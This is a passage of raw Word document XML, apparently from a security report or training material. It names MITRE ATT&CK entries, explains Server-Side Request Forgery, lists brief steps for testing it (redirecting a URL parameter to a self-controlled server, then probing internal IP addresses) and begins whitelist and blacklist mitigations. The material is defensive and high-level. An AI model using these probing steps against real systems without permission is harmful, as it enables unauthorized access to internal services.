              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>A</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="100F0C82">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>:L</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="57F15067">
        <w:trPr>
          <w:trHeight w:val="66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93C572" w14:textId="455504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048ABC" w14:textId="29C7E13B">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4C53A2B" w:rsidP="0D325B6E" w:rsidRDefault="44C53A2B" w14:paraId="7753BF0A" w14:textId="02199B3C">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R5bde9d35f9e6480a">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="44C53A2B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1190: Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="6083A3E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68818C8"/>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31658BE" w14:textId="6C1209E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4D72C3A" w:rsidP="0D325B6E" w:rsidRDefault="24D72C3A" w14:paraId="74BAF2AF" w14:textId="363E4CD2">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R0b15795557694ead">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="24D72C3A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1035: Limit Access to Resource Over Network</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="6BAB809D" w:rsidP="0D325B6E" w:rsidRDefault="6BAB809D" w14:paraId="4405019E" w14:textId="3506FF62">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3237afdb4a7d4bb0">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6BAB809D">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05AFEBD8">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C7C4B4" w14:textId="026F02B5">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69155A5" w14:textId="67FA7075">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372579B" w14:textId="6CE9A0C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="127714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="65EB6917" w14:textId="2A8BE1C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7714A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3AF3112" w:rsidP="0D325B6E" w:rsidRDefault="33AF3112" w14:paraId="4B764799" w14:textId="254F80D5">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3AF3112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server-Side Request Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="71E838ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33AF3112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a web vulnerability that allows an attacker to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="702068BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hav</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33AF3112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">e a server-side application </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33AF3112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="33AF3112">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests to an unintended location. An attacker can fetch content from an external URL</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="62717CB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and trick the application into making requests </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5744AC5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="62717CB6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> internal services or resources that are not normally accessible from the outside.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2D47A94B" w14:textId="2065524E">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27714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="13CED74E" w14:textId="6F603AE1">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27714A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2213E2F" w:rsidP="0D325B6E" w:rsidRDefault="02213E2F" w14:paraId="4EF1B8D1" w14:textId="4094AAF6">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213E2F">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successfully exploiting SSRF can </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 xml:space="preserve">map the </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in</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52993D7D">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er</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67936DFC">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al</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 xml:space="preserve"> network and </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possibly access</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DD39833">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sensitive</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 xml:space="preserve"> data from </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int</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3E343EE6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ernal </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="30E88B98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>services. They can steal sensitive information and cause financial and reputational damage to the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C00DDAE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> APT </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3F8C95C7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>organization</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C00DDAE">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79575E2B" w14:textId="0712532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27714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="34A316D3" w14:textId="06D926C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7714A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11A5ADF" w:rsidP="0D325B6E" w:rsidRDefault="011A5ADF" w14:paraId="75E89122" w14:textId="796788B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1A5ADF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 1: View the applica</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B74013E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tion function </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B74013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B74013E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5B74013E">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B74013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and see that it takes a user-supplied URL as input</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="58E786CB" w:rsidP="0D325B6E" w:rsidRDefault="58E786CB" w14:paraId="261EC941" w14:textId="19F677C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 xml:space="preserve">Step 2: Replace the </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legitimate</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 xml:space="preserve"> external URL with a URL pointing to a service controlled by yourself and verify that the server makes an outbound request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="58E786CB" w:rsidP="0D325B6E" w:rsidRDefault="58E786CB" w14:paraId="0DC3EFAA" w14:textId="12E7D63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Attempt</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="58E786CB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to access internal IP addresses </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72438B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">like </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72438B2C">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72438B2C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and view internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="22BED0B8" w14:textId="275F067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27714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="789EAFE1" w14:textId="2C05448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7714A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27714A6" w:rsidP="0D325B6E" w:rsidRDefault="127714A6" w14:paraId="1301E7E7" w14:textId="4CF0D02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7714A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27714A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127714A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6DB21079" w:rsidP="0D325B6E" w:rsidRDefault="6DB21079" w14:paraId="64455758" w14:textId="46EF43C2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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DB21079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Validate user input by implementing a whitelist </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="77116C02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DB21079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14063607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> domains, IP addresses, and protocols that the application is </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14063607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>permitted</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14063607">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14063607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="14063607">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Validate all user-supplied URLs against this list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E5A91DC" w:rsidP="0D325B6E" w:rsidRDefault="4E5A91DC" w14:paraId="3BBE0462" w14:textId="43E811CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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E5A91DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If a whitelist is not </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="638EB74E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possibl</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="638EB74E">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4E5A91DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to implement, implement a blacklist of disallowed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4B1DE484">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
